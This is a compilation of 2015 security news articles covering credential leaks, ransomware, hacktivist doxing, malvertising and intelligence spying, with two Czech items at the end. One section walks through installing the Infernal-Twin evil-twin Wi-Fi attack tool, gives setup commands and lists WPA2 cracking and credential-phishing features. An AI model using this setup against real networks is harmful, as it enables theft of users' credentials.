200,000 Comcast login credentials available on the Dark Web

During the weekend, nearly 590,000 Comcast email addresses and passwords were offered for sale on a BlackMarket in the dark web.
It is now the turn of Comcast, over the weekend nearly 590,000 Comcast email addresses and passwords were offered for sale on a BlackMarket in the dark web. As proof of the authenticity of the Comcast data, the seller published a list of 112 accounts requesting 300 USD for 100,000 accounts, the entire list of 590,000 accounts goes for $1,000 USD.

The discovery of the singular sale was made first by an individual owning the Twitter account @flanvel, which promptly contacted Salted Hash to report it the news.

Comcast was in possession of the list and it was checking the leaked data, it seems that of the 590,000 records offered for sale on the black marketplace about 200,000 of them were still active.

comcast darkweb

Although they represent a minor part of the bulk data sold by crooks, we can not overlook the fact that the credentials offered could be used to take over the Comcast accounts.

According to the Comcast security team, the systems of the company have not been compromised, every user that will report suspicious activity on his account will be contacted singularly to solve the issue.

It is likely that the data still active and valid comes from a collection of data resulting from other data breaches, they are almost certainly recycled.

Online it is quite easy to find collections of data that come from malware-based attacks, data breaches, and phishing attacks. Unfortunately, users have the bad habit of sharing the same login credentials among different services online, when one of them is compromised attackers can access all the other web services.

In the specific case the list of Comcast login credentials was circulating online since last week, it is likely someone decided to offer it for sale.

Summarizing Comcast wasn’t the victim of a data breach, the company has reset nearly 200,000 passwords after customer list was discovered.

1-Click Way to Check If your Android Device is Vulnerable to Hacking

Vulnerabilities are common these days and when we talk about mobile security, this year has been somewhat of a trouble for Android users. Almost every week we come across a new hack affecting Android devices.
One of the serious vulnerabilities is the Stagefright Security Bug, where all it needed to install malicious code on the Android devices was a simple text message.
Although Google patched these security holes in its latest Android update, manufacturers can take a long time to release their own updates, and it's even possible that older devices may not get the updates at all.
So, even after the release of patches for these critical vulnerabilities, it is difficult to say which Android devices are at risk of what bugs.
There is a one-click solution to this problem. One Android app can help educate you and help you know whether your devices is at risk.
One-Click Solution to Check Your Device for All Critical Bugs
Android Vulnerability Test Suite (VTS), developed by mobile security firm NowSecure, is a free vulnerability scanner that scans your Android device for 22 known device vulnerabilities including Stagefright, potentially alerting you to any of the known issues.
This free, open source Android vulnerability scanner tool is "meant to show the end user the attack surface that a given device is susceptible to."
As NowSecure says on the VTS' Google Play listing, "In implementing these checks we attempt to minimize or eliminate both false positives [as well as] false negatives without negatively affecting system stability."
Note: Your Antivirus product may detect this tool malicious in nature because it contains Stagefright detection code.
As VTS vulnerability scanner is an open-source project from a known and trusted developer, users and security researchers can file bugs or other issues on the GitHub repository.
How to Check your Android Device for All 22 Vulnerabilities?
This free Android vulnerability scanner app is available on Google Play Store, and its code is available on GitHub.
Install VTS for Android and hit the Search button when it appears to launch the Device Vulnerability Scanner.
After about 30 seconds, the Android vulnerability scanner will list all vulnerabilities your devices is vulnerable to.
I tested the app on my fully-patched OnePlus Two smartphone earlier this week and found my device is vulnerable to a few vulnerabilities, including the new variant of the Stagefright bug, Stagefright 2.0.

Cryptowall 4.0 comes from Russia, Bitdefender released a vaccine

Security experts at Bitdefender speculate that the newborn Cryptowall 4.0 has a Russian origin. The company released a vaccine software.
Security experts at Bitdefender seem to have no doubt, the authors of the last variant of the popular Cryptowall ransomware, Cryptowall 4.0 are Russians. The experts came to this conclusion through evidence collected during their investigations, for example, the servers used for spamming the threat are located in Russia, and the Javascript used as a vector downloads the CriptoWall 4.0 payload from a Russian server.

The malware researchers also confirmed that encryption algorithm used to encrypt the victim’s files is the unbreakable AES 256 and the key is encrypted using RSA 2048.

The Cryptowall 4.0 infections were observed across the world, including in France, Italy, Germany, India, Romania, Spain, US, China, Kenya, South Africa, Kuwait and the Philippines.

CryptoWall 4.0

As observed for other threats coming from Russia, Russian users seem to not interested by the ransomware because Cryptowall 4.0 doesn’t encrypt the files if it detects that the computer is using the Russian language.

“Cryptowall 4.0 spam servers are located in Russia, according to The Javascript-written malware downloads the CriptoWall component from a Russian server.” states the post published by Bitdefender.
CryptoWall is a profitable instrument in the hands of criminal organizations, the security researchers of the Cyber Threat Alliance have conducted an investigation into the cybercriminal operations leveraging CryptoWall 3.0 ransomware discovering that the criminals behind the dreaded ransomware already made $325 Million.
The victims have two possibilities, pay the ransom hoping to restore the encrypted documents or waiting that AV vendors will integrate the key used to encrypt their documents in their anti-ransomware solution. Unfortunately, this is possible only if security experts seize one of the C&C servers used by crooks and find on these machines the key used to encrypt the victim’s file.

To hamper the diffusion of the Cryptowall 4.0 Bitdefender has developed a software that allows users to immunize their computers and block file encryption process implemented by ransomware, including the Cryptowall 4.0.

Be aware, if the PC is already infected with CryptoWall 4.0, the “vaccine” will not sanitize it.

The tool is not a complete antivirus solution, but it is a supplementary layer of protection that could increase the resilience of the machine to malware based attacks.

The Infernal-Twin tool, easy hacking wireless networks

The Infernal-Twin is an automated tool designed for penetration testing activities, it has been developed to automate the Evil Twin Attack.
The Infernal-Twin is an automated tool designed for penetration testing activities, it has been developed to assess wireless security by automating the Evil Twin Attack.

“The tool was created to help the auditors and penetration testers to perform wireless security assessment in a quick manner and easing complex attack vectors.” states Khalilov M, the author.

Be aware, as usually happen, penetration testing tool could be misused by hackers to conduct illicit activities, so I decided to present it to spread awareness about this potential weapon in the arsenal of attackers.
Let us start explaining the attack scenario, on the “Evil Twin” attack, the attacker set up a bogus Wi-Fi access point, purporting to provide wireless Internet services, but eavesdropping the user’s traffic.
The bogus Access Point is used to serve to the users in the network faked login pages to steal their Wi-Fi credentials and other sensitive data. The attack scenario could be exploited to run man-in-the-middle attacks or to serve malware to the computers in the targeted network.
First of all you need to install all the components necessary to use the tool, including the Apache module, the mysql database, the Scapy packet manipulation tool for computer networks and the wxtools debugging framework.

Then you have to install the Aircrack-ng utility and get the infernal-twin from the repository.
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.

To install the components follow these steps

$ sudo apt-get install apache2
$ sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql

$ sudo apt-get install python-scapy
$ sudo apt-get install python-wxtools
$ sudo apt-get install python-mysqldb

$ sudo apt-get install aircrack-ng

$ git clone https://github.com/entropy1337/infernal-twin.git
$ cd infernal-twin
Infernal-Twin 2

At this point launch the Infernal-Twin tool with super administrator privileges. Some users experienced problems connecting to the Database, the user @lightos provided the following solution to fix the issue.

Create a new user on the database and use it for launching the tool by following this procedure:

Delete dbconnect .conf file from the Infernal wireless folder
Run the following command from your mysql console.
mysql> use mysql;
mysql> CREATE USER ‘root2’@’localhost’ IDENTIFIED BY ‘enter the new password here’;
mysql> GRANT ALL PRIVILEGES ON \*.\* TO ‘root2’@’localhost’ WITH GRANT OPTION;
Try to run the tool again.
The Infernal -Twin tools implements several features, it provides all the necessary to hack a Wireless network (WPA2, WEP) and easily allows to run Wireless Social Engineering attacks. Below the principal features:

GUI Wireless security assessment SUIT
WPA2 hacking
WEP Hacking
WPA2 Enterprise hacking
Wireless Social Engineering
SSL Strip
Report generation
PDF Report
HTML Report
Note taking function
Data is saved into Database
Network mapping
Probe Request
The author of the Infernal-Twin hacking tool, Khalilov M, aka 3ntr0py (entropy1337), announced that next releases will include parsing t-shark log files for gathering victim’s credentials and other data.

In the following video is it illustrated an attack on public network, the script should be able to go and modify the login page and alter the content of it with necessary variables.

Below another video turorial on the Infernal-Twin Tool.

If you are interested in Wireless hacking for penetration testing give a look also to WiFiPhisher, a WiFi social engineering tool that allows an attacker to steal credentials from users of secure WiFi networks.

WiFiPhisher was developed by the Greek security expert George Chatzisofroniou and is available for download on the software development website GitHub.

British NCA revealed to have hacking abilities, aka equipment interference

Documents published by the UK Government reveal that the UK’s National Crime Agency has the hacking capabilities, so called equipment interference.
We have debated for a long time about hacking capabilities of principal law enforcement and intelligence agencies.

Many documents leaked by the whistleblower Edward Snowden revealed that the UK intelligence agency, the GCHQ has the ability to compromise practically every target, exactly like the cousin of the NSA.

Now for the first time the technological abilities of the UK’s National Crime Agency (NCA) have been revealed in a collection of documents, the British law enforcement agency has “equipment Interference” (EI) capabilities, which allow it to hack into mobile devices and computers.

NCA website

Last week, the UK government published the draft Investigatory Powers Bill, a debated proposed of a legislation that would force internet service providers to store the internet browsing history of all citizens for up to one year.

Eric King, the deputy director of the Privacy International, who analyzed the document noticed that in a section there is the explicit reference to the capability of the UK law enforcement having the capability to conduct “equipment interference.”

“Equipment interference is currently used by law enforcement agencies and the security and intelligence agencies,” states the section. The documents also reveal that “more sensitive and intrusive techniques” are available to a “small number of law enforcement agencies, including the National Crime Agency.”

The document “Factsheet—Targeted Equipment Interference” published by the UK government a few days ago provides further information on the Equipment interference available at the National Crime Agency.

[The Equipment interference is] “the power to obtain a variety of data from equipment. This includes traditional computers of computer-like devices such as tablets, smart phones, cables, wires and static storage devices.”
Equipment interference, also known as “computer network exploitation,” has different levels of complexity. The agents at the National Crime Agency can use it to infect computers or to remotely deploy a spyware on mobile devices

[Sophisticated Equipment interference] allows NCS “remotely installing a piece of software on to a device.” the document reads. “the software could be delivered in a number of ways and then be used to obtain the necessary intelligence.” “Equipment interference capabilities have made a vital contribution to the UK from Islamist terrorism and have also enabled the disruption of paedophile-related crime.”
According to experts, there is little doubt that these practices could more simply be described as hacking.

The security research Claudio Guarnieri offered his comment to Motherboard about the Equipment interference capabilities of the British law enforcement Agency.

“However you put it, and regardless of ‘interference,’ it clearly speaks of equipment, so it most certainly isn’t referring to any sort of passive wiretapping. And the only thing you can do to equipment is, well, hack it,” explained Guarnieri “This appears to confirm for the very first time that British law enforcement are in the hacking business,” added King from Privacy International. “What statutory authority are the police claiming grants them these powers? How often have they been used? Has hacked material been used in criminal prosecutions? Have courts been notified evidence presented before them might have been tampered with by hacking?” King added.

ISIS Supporter Hacks 54,000 Twitter Accounts and Posts Details of Heads of the CIA and FBI

ISIS Supporters Hack 54,000 Twitter Accounts and Posts Personal Data of Heads of the CIA and FBI
ISIS hackers have hacked tens of thousands of Twitter accounts, including the accounts of the members of CIA and the FBI, in revenge for the US drone strike that killed a British ISIS extremist in August.
The Cyber Caliphate, a hackers group set up by British ISIS member Junaid Hussain, urged its supporters and followers to hack Twitter accounts in order to take revenge of Husain's death.
Over 54,000 Twitter Accounts Hacked!
As a result, the hackers were able to hack more than 54,000 Twitter accounts. Most of the victims targeted by Jihadis appear to be based in Saudi Arabia though some of the them are British.
One of the victims based in Saudi Arabia, whose Twitter account was compromised by the ISIS extremists, said, "I am horrified at how they got hold of my details."
The extremists not only hacked thousands of Twitter accounts, but they also posted hacked personal information, including phone numbers and passwords, of the heads of:
The Central Intelligence Agency (CIA)
The Federal Bureau of Investigation (FBI)
The United States's National Security Agency
'We Are Back with a BANG'
Hussain was a British hacker who rose to prominence within Islamic State Terrorist group (better known as ISIS) in Syria as a top cyber expert to mastermind the ISIS online war before a US drone killed him in August.
After Hussain's death, Cyber Caliphate (@cyber_caliph), which took control of the official Twitter and YouTube accounts of the US military's Central Command (CENTCOM) in January, reappeared on Twitter last Sunday.
ISIS Supporters Hack 54,000 Twitter Accounts and Posts Personal Data of Heads of the CIA and FBI
"We are back," Cyber Caliphate declared in an opening tweet.
Before its accounts got suspended by Twitter, Cyber Caliphate tweeted a link to the database that contained stolen Twitter accounts, including passwords, although the data could not be verified yet.
The incident came just a day after another hacking group, Crackas With Attitude (CWA), claimed to have gained access to a Law Enforcement Portal that contains arrest records and tools for sharing information about terrorist events and active shooters.

Threat actors hacked the popular Touchnote company

On 4th November 2015, Touchnote company received information confirming that is has been the victim of a data breach that exposed customer data.
Data breaches are becoming a daily event, the last one in the headlines it the hack suffered by the Touchnote postcard app.

Hackers have stolen customer data from Touchnote database, the popular app that is used to create postcards from pictures taken by the users. The app is very popular because is comes pre-installed on millions of handsets, nearly 4 million postcards have been sent via the Touchnote app since it was launched in 2008.

The company has already informed its customers via email, according the official statement issued by Touchnote hackers have accessed users’ personal information, including names, email and home addresses.

“On 4th November 2015 we received information confirming that Touchnote has been the victim of criminal activity, resulting in the theft of some of our customer data.

The data that was accessed included your name, email address, postal address and your Touchnote order history, registered with Touchnote does not store your full credit/debit card number, expiry date or security code. Therefore, this information was not accessed.

The data that was accessed included the last four digits of your card number (e.g. XXXX XXXX XXXX 1234) which on its own cannot be used for making financial transactions.” states the email.”

touchnote email

The company informed the customers that it is supporting investigation conducted by the UK’s National Cyber Crime Unit, at the time I’m writing there is no news regarding the real number of affected users.

The company highlighted that financial data was not exposed by the data breach, the hackers compromised only the last four digits from customer cards, but the firm clarified that it doesn’t store full card information (card numbers, expiration dates or security codes).

Touchnote stored passwords in an encrypted format, anyway it is recommending customers to change them.

“None of the data that may have been accessed is financially sensitive,” Touchnote said.

The company announced an improvement of its security measures.

Touchnote users are invited to carefully read the Q&A page published on the company website, other info will be provided via Twitter.

Cyber Caliphate Hacks 54k Twitter accounts, including ones of CIA and FBI officials

The ISIS group known as the Cyber Caliphate hacked 54,000 Twitter accounts and leaked online data of heads of the CIA and FBI.
We have discussed several times about the cyber capabilities of the ISIS sympathizers, recently Mikko Hyppönen, Chief Research Officer for F-Secure, said he worries about cyber extremists that could penetrate critical infrastructure and cause serious damages.

The expert explained that the ISIS is probably the first group of terrorist that has hacking capabilities to manage a major attack against a government infrastructure, and the situation is getting worse because this group is gaining greater awareness of the effectiveness of an offensive launched by the cyberspace.

Now ISIS hackers are in the headline once again, they collective known as the Cyber Caliphate has hacked tens of thousands of Twitter accounts, including the accounts belonging to several members of the CIA and the FBI, in revenge for the US drone strike that killed the British Jihadist hacker Junaid Hussain in August.

“Jihadis have hacked tens of thousands of Twitter accounts in retaliation for the drone attack that killed a British Islamic State extremist. A group called Cyber Caliphate, set up by Junaid Hussain from Birmingham, urged its followers to take control of the accounts to spread IS propaganda. Most of the victims appear to be based in Saudi Arabia, though some are feared to be British. In what experts described as a worrying escalation of the global cyber war, details of more than 54,000 Twitter accounts, including passwords, were posted online last Sunday.” reported the DailyMail.

The intelligence analysts believe that the Cyber Caliphate is a group of hackers directly linked to the ISIS terrorist organization and Junaid Hussain was one of its founders.
The Cyber Caliphate is in hacking operation and propaganda on the Internet, it incites supporters and followers to hack Twitter accounts of Western Government and military organization in order to avenge the death of their brother.
The hackers hijacked more than 54,000 Twitter accounts, most of the accounts belong to users in Saudi Arabia. The hackers of the Cyber Caliphate leaked online personal information of the victims, including phone numbers and passwords, exposing them to serious risks.

“I am horrified at how they got hold of my details.” said one of the victims.
Among the victims of the Cyber Caliphate, there are senior officials of the Central Intelligence Agency (CIA), the Federal Bureau of Investigation (FBI), and The United States’s National Security Agency.
cyber caliphate hack 54k twitter accounts 3

“We are back,” Cyber Caliphate declared via Twitter through an account that has been already suspended.

In May, the hackers of the Cyber Caliphate published a video threatening crippling cyber attacks against the Europe, United States, Europe and Australia. The terrorists claimed to have the necessary cyber capabilities to spy on Western communications.

“The electronic war has not yet begun,” the pro-ISIS hackers boasted in their latest video threatening the cyberattacks.
The group, which was involved in the hijacking of social media accounts belonging to the US CENTCOM, released a propaganda video threatening cyberattacks anticipating the operation of the terrorists on the Internet.

“Praise to Allah, today we extend on the land and in the internet. We send this message to America and Europe. We are the hackers of the Islamic State and the electronic war has not yet begun,” the video said with a distorted voice and picture of an Anonymous member. “What you have seen is just a preface of the future. We are able until this moment to hack the website of the American leadership and the website of the Australian airport and many other websites.”

What is Threat Intelligence and How It Helps to Identify Security Threats

Simply put, threat intelligence is knowledge that helps you identify security threats and make informed decisions. Threat intelligence can help you solve the following problems:
How do I keep up to date on the overwhelming amount of information on security threats…including bad actors, methods, vulnerabilities, targets, etc.?
How do I get more proactive about future security threats?
How do I inform my leaders about the dangers and repercussions of specific security threats?
Threat Intelligence: What is it?
Threat intelligence has received a lot of attention lately. While there are many different definitions, here are a few that get quoted often:
Threat intelligence is evidence-based knowledge, including context, mechanisms, indicators, implications and actionable advice, about an existing or emerging menace or hazard to assets that can be used to inform decisions regarding the subject's response to that menace or hazard. – Gartner
The set of data collected, assessed and applied regarding security threats, threat actors, exploits, malware, vulnerabilities and compromise indicators – SANS Institute
Why is everyone talking about it?
Verizon’s 2015 DBIR estimated a financial loss of $400 million from 700 million compromised records, which resulted from 79,790 security incidents!
As long as security threats and breaches occur, every business will look for ways to protect their data. The threat landscape is always changing and the business risk is increasing because of our dependence on IT systems.
Threats come from internal as well as external sources. Bottom line is, organizations are under tremendous pressure to manage threats. Though information in the form of raw data is available abundantly, it is hard and time-consuming to get meaningful information based on which proactive measures can be set.
This naturally pulls more and more users towards threat intelligence as it helps to prioritize threats within the deluge of data, alerts, and attacks and provides actionable information.
The table below presents several common indicators of compromise that can be identified with threat intelligence feeds:
Category Indicators of Compromise Examples
IP addresses
Domain names
Malware infections targeting internal hosts that are communicating with known bad actors
Sender’s email address and email subject
Phishing attempts where internal hosts click on an unsuspecting email and “phone home” to a malicious command and control server
Filenames and file hashes (e.g. MD5)
Registry keys
Dynamic link libraries (DLLs)
Mutex names
External attacks from hosts that might be infected themselves or are already known for nefarious activity
Threat Intelligence capabilities
Attacks can be broadly categorized as user based, application based and infrastructure based threats. Some of the most common threats are SQL injections, DDoS, web application attacks and phishing.
It is important to have an IT security solution that provides threat intelligence capabilities to manage these attacks by being both proactive and responsive.
Attackers are constantly changing their methods to challenge security systems. Therefore, it becomes inevitable for organizations to get threat intelligence from a variety of sources.
One of the proven methods to stay on top of attacks is to detect and respond to threats with a SIEM (Security Information & Event Management system).
A SIEM can be used to track everything that happens in your environment and identify anomalous activities. Isolated incidents might look unrelated, but with event correlation and threat intelligence, you can see what is actually happening in your environment.
Nowadays, IT security professionals must operate under the assumed breach mentality. Comparing monitored traffic against known bad actors sourced from threat intelligence would help in identifying malicious activities.
However, this could be manual and time-consuming. Integrating indicator based threat intelligence to a SEIM security solution would help in identifying compromised system and possibly even prevent some attacks.
Best Practices
Integrating threat intelligence and responding to attacks is not enough to combat the ever-changing threat landscape. You need to analyze the situation and determine threats you are likely to face, based on which you can come up with precautionary measures.
Here is a list of several best practices:
Have an application whitelist and blacklist. This helps in preventing execution of malicious or unapproved programs including, .DLL files, scripts and installers.
Check your logs carefully to see if an attempted attack was an isolated event, or if the vulnerability had been exploited before.
Determine what was changed in the attempted attack.
Audit logs and identify why this incident happened – reasons could range from system vulnerability to an out-of-date driver.
What will threat intelligence enabled SIEM solve
A SIEM, like SolarWinds Log & Event Manager, collects and normalizes log data from monitored traffic and automatically tags suspicious events.
With integrated threat intelligence mechanism and built-in rules, the monitored events can be compared against the list of constantly updated known bad actors.
You can quickly search & monitor for hits from the bad actors against the log data in real time and identify common indicators of compromise.
You can automatically respond with actions like blocking known bad IP addresses, in case of malicious attack attempts.
Watch how threat intelligence works in a SIEM and download your free trial of a leading SIEM from SolarWinds.

Hackers have Hacked into US Arrest Records Database

The Group of teenage hackers, which previously hacked into the personal email of the CIA director John Brennan and published a large trove of sensitive data, has now had its hands on even more important and presumably secure target.
Hackers Accessed Law Enforcement Private Portal
The hacking group, Crackas With Attitude (CWA), claims it has gained access to a Law Enforcement Portal through which one can access:
Arrest records
Tools for sharing information about terrorist events and active shooters
The system in question is reportedly known as the Joint Automated Booking System (JABS), which is only available to the Federal Bureau of Investigation (FBI) and law enforcement.
Hackers Gained Access to FBI's Real-Time Chat System
Moreover, the hacking group also says it has gained access to another tool that is something like a real-time chat system for the FBI to communicate with other law enforcement agents around the US.
Two days ago, CWA published a portion of the data it collected to Pastebin and Cryptobin, apparently releasing names, email addresses, and phone numbers of around 3,500 law enforcement and military personnel.
JABS System Hacked!
However, the group has been able to have its hands on many law enforcement tools that contain more sensitive information, and Wired verified that a screenshot of JABS shared by CWA was legitimate.
The CWA hackers told Wired they found a vulnerability that allowed them to gain access to the law enforcement private portal, giving the group access to dozen law enforcement tools, but the hackers didn't reveal anything about the vulnerability.
This system is noteworthy as it may allow anyone with access to view arrest records – whether the arrests are sealed or aren't available to the public.
It means, among other things, this system can expose secret informants and others who have been detained but are now working with the law enforcement agencies.
Although none of the information from these law enforcement tools has been shared publicly, the hacking group could bother government officials by releasing the sensitive information anytime soon.

Malvertising attack hit The Economist, anti-ad blocking service PageFair hacked

PageFair, the anti-ad blocking analytics service used by The Economist’s was hacked on Halloween and the attackers used it to serve malware.
On Halloween, hackers have compromised the anti-ad blocking service PageFair used by The Economist exposing readers to malware infections.
PageFair allows publishers to measure how many visitors block their ads, users who visited The Economist’s website from October 31 to early hours of November 1 may have installed a keylogger disguised as an Adobe update onto their machines.
“On Oct. 31, 2015, one of economist.com’s vendors, PageFair, was hacked. If you visited economist.com at any time between Oct. 31, 23:52 GMT and Nov. 1, 01:15 GMT, using Windows OS and you do not have trusted anti-virus software installed, it is possible that malware, disguised as an Adobe update, was downloaded onto your PC. If you accepted what looked like an Adobe update when you visited economist.com,” states a security advisory published by The Economist.

The Economist hired a security firm to investigate the attack, the experts confirmed that the malware used by the threat actors is a Windows keylogger, it is likely attackers were interested in obtaining visitors’ personal data, including login credentials.
the economist

The Economist confirmed that the company systems have not been compromised by the hacker that instead exploited the anti-ad blocking service PageFair.

Charles Barber, a spokesperson for the publication, told Quartz that only a limited number of visitors have been infected according to data provided by PageFair.

PageFair confirmed that its analytics network has been exploited to serve the malware for about 80, the malvertising attack was discovered after five minutes, but the company spent more than a hour to halt the attack.

“It is now six days since one of our CDNs was compromised for 83 minutes by a hacker. We have worked hard this week to analyse and disclose what happened to our clients and the world. Thanks to the cooperation of the NanoCore author and the dynamic DNS service Dyno, whatever access the hacker had to infected computers was shut down on Tuesday. In addition, for the last 4 days over 90% of antivirus tools (by market share) are detecting and cleaning the malware.” states PageFair in a official statement. “If you are a publisher using our free analytics service, you have good reason to be very angry and disappointed with us right now,” PageFair CEO Sean Blanchfield told MediaPost. “The attack was sophisticated and specifically targeted against PageFair, but it is unacceptable that the hackers could gain access to any of our systems.”

The Economist is just one of the 501 publishers that were affected by the security breach and 2.3% of their visitors were placed at risk,.

The Economist provided the following suggestions to its readers:

Change your passwords on all systems
Contact your financial providers and check bank and credit card statements for unusual activity
Run anti-virus software from a reputable provider. We recommend the following:
Windows Defender (if you have Windows 10 or 8.1)
Microsoft Security Essentials (if you have Windows 7 or Windows Vista)
Avast (free)
Malwarebytes (free)
Download and install the tool.
Run a full system scan.
The malware should be identified and removed.

Linux ransomware already infected at least tens of users

Researchers at Russian antivirus company Doctor Web have discovered a Linux ransomware that has already infected tens of users.
Ransomware is a profitable instrument in the criminal ecosystem, security experts discover new variant on a weekly basis. This week the new variant of Cryptowall, the Cryptowall 4.0, appeared in the wild, meanwhile an offline ransomware is targeting Russian users.

News of the day is that researchers at Russian antivirus company Doctor Web have spotted a new file-encrypting ransomware, dubbed Linux.Encoder.1, that is targeting Linux systems. It has been estimated that tens of users have already fallen victim to this Linux ransomware.

“Doctor Web warns users about new encryption ransomware targeting Linux operating systems. Judging from the directories in which the Trojan encrypts files, one can draw a conclusion that the main target of cybercriminals is website administrators whose machines have web servers deployed on. Doctor Web security researchers presume that at least tens of users have already fallen victim to this Trojan.” states the blog post published by Doctor Web.

The Linux ransomware is written in C and leverages the PolarSSL library, it launches itself as a daemon that encrypt data and deletes the original files from the system

Linux ransomware ransom demand

The Linux ransomware requires administrator privileges in order to work, once a machine is infected by the threat, the malware downloads the files containing attackers’ demands and a file containing the path to a public RSA key. The Linux ransomware is launched as a daemon and deletes the original files, subsequently, the RSA key is used to store AES keys used to encrypt files.

“First, Linux.Encoder.1 encrypts all files in home directories and directories related to website administration. Then the Trojan recursively traverses the whole file system starting with the directory from which it is launched; next time, starting with a root directory (“/”). At that, the Trojan encrypts only files with specified extensions and only if a directory name starts with one of the strings indicated by cybercriminals.” continues the post.
“To encrypt each file, the Trojan generates an AES key. After files are encrypted using AES-CBC-128, they are appended with the .encrypted extension. Into every directory that contains encrypted files, the Trojan plants a README_FOR_DECRYPT.txt file with a ransom demand,” Dr. Web explained.

In order to recover the encrypted files, victims are asked to pay one Bitcoin (roughly $380 at today’s rate), once the ransom is paid the files are decrypted using a private RSA key that retrieves the AES key from encrypted files.

Cracka hackers doxed more than 2,000 Government employees

Cracka hackers who took over the personal email account of CIA Director John Brennan have now doxed more than 2000 Government employees.
The young hackers of the crew known as Crackas With Attitude (CWA) announced that they have doxed more than 2,000 Government employees.

The hackers are the same that accessed into the AOL email account of the CIA director and violated the email account of the FBI Deputy Director’s wife.

Now the hackers claim to have broken into government computers, on Thursday the official account of the Cracka group published a list of more than 2,000 names, phone numbers and email addresses of law enforcement and military personnel.

cracka tweet

Cracka claimed to have broken into government systems and leaked the data belonging to government employees in support of Palestine

“Maybe the USgov should listen to us, I mean, we have enough information to make them look like the little bitches they are,” Cracka said in a tweet.
cracka tweet 2

How did Cracka obtain the information?

Members of the group explained to Motherboard that they took over the account of an internal employee, then they got access to several “tools feds use” such as the JABS, a database containing information on the arrested people, the IC3, that is crime-reporting tool used by the FBI, and VCC, a sharing tool for law enforcement agencies.

cracka jabs

Wired reported that hackers exploited a flaw to gain access to the private portal.

“The CWA hackers said they found a vulnerability that allowed them to gain access to the private portal, which is supposed to be available only to the FBI and other law enforcement agencies around the country. That portal in turn, they say, gave them access to more than a dozen law enforcement tools that are used for information sharing.” states Wired.

Cracka doesn’t provide information on the hacked account, it is clear that the employee is “high in the [government].” The hacker confirmed that they didn’t download all the data available.

“We let the [government] off by a lot, this could be so damaging it could affect the whole of USA by ALOT,” the hacker explained via online chat.

Cracka also published a tweet claiming to have stolen also “34,000 lines of emails, names, position and phone numbers of gov associates, including military.”

As correctly highlighted by Cracka, this kind of data breach could have serious consequence for the Homeland Security. The personal information belonging to government entities could be used by foreign state-sponsored hackers in cyber espionage operations.

“Just to clear this up, CWA did, indeed, have access to everybody in USA’s private information, now imagine if we was [sic] Russia or China,” he said in another tweet.
cracka tweet 3

Journalists at Motherboard confirmed that at least five random numbers in the list they analyzed are legitimate.

The German Intelligence Systematically Spied on Allies

The Der Spiegel magazine reported German Intelligence Agency BND “systematically spied” on its allies and several international organizations.
In the last months, the German Intelligence has accused the NSA of spying on Government members, including the Chancellor Angela Merkel.

In October, the German authorities have launched a probe into allegations of a new case of US espionage after they have found a laptop infected by the Regin Spyware.

The German Parliament also suffered numerous cyber attacks that spread a highly sophisticated malware inside the network of the Bundestag, the investigators speculate the involvement of nation-state actors, likely Russian state-sponsored hackers.

Victims or victimizers?

The German intelligence agency BND has already been accused of spying on officials at the French foreign ministry and the presidency, as well as the European Commission. The German spies alleged operated on behalf of the NSA.

Bundestag German Intelligence

In April 2015, the Der Spiegel revealed the German intelligence agency BND helped NSA in monitoring European politicians.

“At least since 2008 BND employees fell several times that some of these selectors contrary to the mission profile of the German foreign intelligence – and are not covered by the “Memorandum of Agreement”, which negotiated the Germans and the Americans to jointly combat global terrorism in 2002 had. Instead, the NSA was looking for specific information about over the defense group EADS, Eurocopter and French authorities. The BND did not take the obviously but as an opportunity to review the Selektorenliste systematically.

Only after the unveiling of the NSA scandal in the summer of 2013, a BND department dealt specifically with the NSA search terms.” states the Der Spiegel.

Now the RBB Radio and Spiegel Online are claiming that the BND is also responsible for cyber espionage on its own account on several embassies and administrations of “European states and allies”.

“the BND had systematically spied on ‘allies’ across the world, including on the interior ministries of the United States, Poland, Austria, Denmark and Croatia.” states the Spiegel.
According to the Der Spiegel, the German Secret Service spied on the US delegation at the European Union in Brussels and the UN in New York, the US Treasury, and several embassies in Germany, including those of the US, France, Britain, Sweden, Portugal, Greece, Spain, Italy, Switzerland, Austria and the Vatican.

The German intelligence appears very active, the German spies also spied on the Geneva-based International Committee of the Red Cross and Oxfam.

The unique certainly is that every government is currently conducting covert operations in the cyber space to gather intelligence and spy on allies and adversaries.

Kyberzločinci mají nový trik, jak šířit vyděračský virus

6.11.2015 Viry
Doslova jako mor se začaly internetem šířit podvodné e-maily, ve kterých straší kyberzločinci příjemce pozastavením funkčnosti domény. Ve skutečnosti se jim ale snaží do počítače propašovat nezvaného návštěvníka, jehož pomocí jej pak budou vydírat. Před novou hrozbou varoval český Národní bezpečnostní tým CSIRT.
„V posledních dnech probíhala v zahraničí phishingová kampaň zaměřená na držitele domén. V e-mailu, který držitelé domén obdrželi, byla informace o údajném pozastavení jejich domény kvůli porušování politiky jejich registrátora,“ uvedl analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.

Riziko představují podvodné odkazy ve zprávách. „Odkazy v e-mailech vedou podle našich informací ke stažení ransomwaru,“ doplnil Bašta.

Ransomware se na internetu objevuje v různých obměnách. Jde o škodlivý kód, který dokáže zašifrovat data na pevném disku a za jejich obnovení požaduje výkupné. Vzhledem k tomu, že za odblokování počítače piráti požadují zpravidla 100 dolarů (2000 Kč), vyšplhá se ve výsledku „výkupné“ až na několik stovek tisíc korun denně.

Výkupné neplatit
Ani po zaplacení výkupného navíc nemají uživatelé jistotu, že se ke svým datům skutečně dostanou. Virus je nutné z počítače odinstalovat a data následně pomocí speciálního programu odšifrovat. [celá zpráva]

„Nelze vyloučit, že se podobný podvod v budoucnu objeví také v České republice. Držitelům domén proto doporučujeme v případě obdržení jakékoli podezřelé zprávy postupovat s rozvahou,“ uzavřel Bašta s tím, že zvýšená obezřetnost je vhodná také u tuzemských uživatelů.

Kybernetické útoky stály firmy za poslední rok 315 miliard dolarů

6.11.2015 Analýzy
Kybernetické útoky stály v posledních 12 měsících celosvětově firmy 315 miliard dolarů. Napadený byl přitom každý šestý podnik. Navzdory mediálně známým případům narušení bezpečnosti a stále častějším hackerským útokům se téměř polovina firem nadále vystavuje riziku tím, že nemají žádnou komplexní strategii pro prevenci digitální trestné činnosti. Vyplývá to ze studie společnosti Grant Thornton.
V Česku hrozí spíše útok na databáze osobních dat než kyberútok na strategickou infrastrukturu.
